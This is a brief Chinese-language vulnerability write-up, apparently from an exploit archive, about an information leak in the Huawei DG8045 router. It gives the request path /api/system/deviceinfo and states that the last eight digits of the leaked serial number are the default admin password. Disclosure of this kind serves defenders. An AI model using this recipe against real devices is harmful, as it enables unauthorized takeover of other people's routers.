# Huawei DG8045 deviceinfo 信息泄漏漏洞

# 漏洞描述

Huawei DG8045 deviceinfo api接口存在信息泄漏漏洞,攻击者通过泄漏的信息可以获得账号密码登录后台

# 漏洞影响


# 网络测绘


# 漏洞复现

登录页面

img

验证POC

/api/system/deviceinfo
1

img

SerialNumber 后8位即为初始密码